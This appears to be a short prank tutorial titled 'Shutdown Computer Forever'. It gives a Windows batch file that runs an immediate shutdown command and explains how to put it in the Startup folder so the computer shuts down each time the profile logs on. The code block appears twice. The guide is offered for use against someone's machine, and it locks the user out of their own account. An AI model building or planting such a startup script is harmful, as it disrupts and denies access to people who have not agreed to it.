Shutdown Computer Forever
by the guardians in Living > Pranks, Tricks, & Humor
40976 Views, 12 Favorites, 0 Comments
Shutdown Computer Forever
Make a batch file with shutdown commands and paste to startup!
Make the Batch File
Go to notepad and type the following between the lines:
_____________________________________________
@echo off
cd /
shutdown -s -t 00 -c "Permanent Shutdown"
exit
_____________________________________________
_____________________________________________
@echo off
cd /
shutdown -s -t 00 -c "Permanent Shutdown"
exit
_____________________________________________
Save As .bat
Go to file > save as > Permanent Shutdown.bat > save
Send to Desktop
Find that file we just made in all files right click it > send to > desktop (create shortcut).
Paste to Startup
Go to Start > All Programs > Startup > right click startup folder > Open > drag and drop the Permanent Shutdown file from the desktop to the empty box. Now every time that profile logs on, it will logoff.